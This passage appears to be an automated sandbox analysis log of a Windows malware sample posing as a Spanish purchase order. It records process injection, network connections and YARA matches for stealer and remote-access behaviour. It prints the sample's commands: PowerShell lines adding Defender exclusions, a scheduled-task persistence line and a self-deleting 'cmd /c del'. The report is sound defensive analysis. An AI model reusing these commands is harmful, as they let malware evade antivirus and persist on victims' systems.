          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01864690 mov eax, dword ptr fs:[00000030h]9_2_01864690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01864690 mov eax, dword ptr fs:[00000030h]9_2_01864690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189C6A6 mov eax, dword ptr fs:[00000030h]9_2_0189C6A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018966B0 mov eax, dword ptr fs:[00000030h]9_2_018966B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A6C7 mov ebx, dword ptr fs:[00000030h]9_2_0189A6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A6C7 mov eax, dword ptr fs:[00000030h]9_2_0189A6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE6F2 mov eax, dword ptr fs:[00000030h]9_2_018DE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE6F2 mov eax, dword ptr fs:[00000030h]9_2_018DE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE6F2 mov eax, dword ptr fs:[00000030h]9_2_018DE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE6F2 mov eax, dword ptr fs:[00000030h]9_2_018DE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E06F1 mov eax, dword ptr fs:[00000030h]9_2_018E06F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E06F1 mov eax, dword ptr fs:[00000030h]9_2_018E06F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE609 mov eax, dword ptr fs:[00000030h]9_2_018DE609
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187260B mov eax, dword ptr fs:[00000030h]9_2_0187260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187260B mov eax, dword ptr fs:[00000030h]9_2_0187260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187260B mov eax, dword ptr fs:[00000030h]9_2_0187260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187260B mov eax, dword ptr fs:[00000030h]9_2_0187260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187260B mov eax, dword ptr fs:[00000030h]9_2_0187260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187260B mov eax, dword ptr fs:[00000030h]9_2_0187260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187260B mov eax, dword ptr fs:[00000030h]9_2_0187260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A2619 mov eax, dword ptr fs:[00000030h]9_2_018A2619
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187E627 mov eax, dword ptr fs:[00000030h]9_2_0187E627
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01896620 mov eax, dword ptr fs:[00000030h]9_2_01896620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01898620 mov eax, dword ptr fs:[00000030h]9_2_01898620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186262C mov eax, dword ptr fs:[00000030h]9_2_0186262C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0187C640 mov eax, dword ptr fs:[00000030h]9_2_0187C640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A660 mov eax, dword ptr fs:[00000030h]9_2_0189A660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A660 mov eax, dword ptr fs:[00000030h]9_2_0189A660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192866E mov eax, dword ptr fs:[00000030h]9_2_0192866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192866E mov eax, dword ptr fs:[00000030h]9_2_0192866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01892674 mov eax, dword ptr fs:[00000030h]9_2_01892674
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018609AD mov eax, dword ptr fs:[00000030h]9_2_018609AD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018609AD mov eax, dword ptr fs:[00000030h]9_2_018609AD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E89B3 mov esi, dword ptr fs:[00000030h]9_2_018E89B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E89B3 mov eax, dword ptr fs:[00000030h]9_2_018E89B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E89B3 mov eax, dword ptr fs:[00000030h]9_2_018E89B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192A9D3 mov eax, dword ptr fs:[00000030h]9_2_0192A9D3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F69C0 mov eax, dword ptr fs:[00000030h]9_2_018F69C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A9D0 mov eax, dword ptr fs:[00000030h]9_2_0186A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A9D0 mov eax, dword ptr fs:[00000030h]9_2_0186A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A9D0 mov eax, dword ptr fs:[00000030h]9_2_0186A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A9D0 mov eax, dword ptr fs:[00000030h]9_2_0186A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A9D0 mov eax, dword ptr fs:[00000030h]9_2_0186A9D0
Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_00211B93 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe | Network Connect: 185.53.179.92 80
Source: C:\Windows\explorer.exe | Network Connect: 198.185.159.144 80
Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe"
Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe"
Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | NtClose: Indirect: 0x13AA56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | NtClose: Indirect: 0x1AEA56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | NtQueueApcThread: Indirect: 0x1AEA4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | NtQueueApcThread: Indirect: 0x13AA4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | NtClose: Indirect: 0x1AAA56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | NtQueueApcThread: Indirect: 0x1AAA4F2
Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\systray.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\systray.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread register set: target process: 4004
Source: C:\Windows\SysWOW64\systray.exe | Thread register set: target process: 4004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread register set: target process: 4004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread register set: target process: 4004
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section unmapped: C:\Windows\SysWOW64\systray.exe base address: 210000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: B0000
Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E66008
Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EF3008
Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe"
Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe"
Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp"
Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp5339.tmp"
Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\systray.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: explorer.exe, 0000000A.00000002.4550116031.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2148393301.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: IProgram Manager
Source: explorer.exe, 0000000A.00000002.4551964483.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2156688797.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4550116031.00000000013A1000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000002.4550116031.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2148393301.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000002.4549252856.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2146894369.0000000000D69000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: +Progman
Source: explorer.exe, 0000000A.00000002.4550116031.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.2148393301.00000000013A0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.2162129240.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4554886834.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.2984822872.00000000098AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd31A
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeQueries volume information: C:\Users\user\Desktop\Orden de compra 0307AR24.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll | VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat | VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll | VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll | VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll | VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ | VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat | VolumeInformation
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | Queries volume information: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | VolumeInformation
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll | VolumeInformation
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll | VolumeInformation
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll | VolumeInformation
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll | VolumeInformation
          Source: C:\Windows\SysWOW64\systray.exe | Code function: 14_2_00211A45 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000015.00000002.2320893127.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.4549121578.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.4549613061.00000000046E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000E.00000002.4549675658.0000000004710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.2215419280.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000B.00000002.2239061216.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.2165242288.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
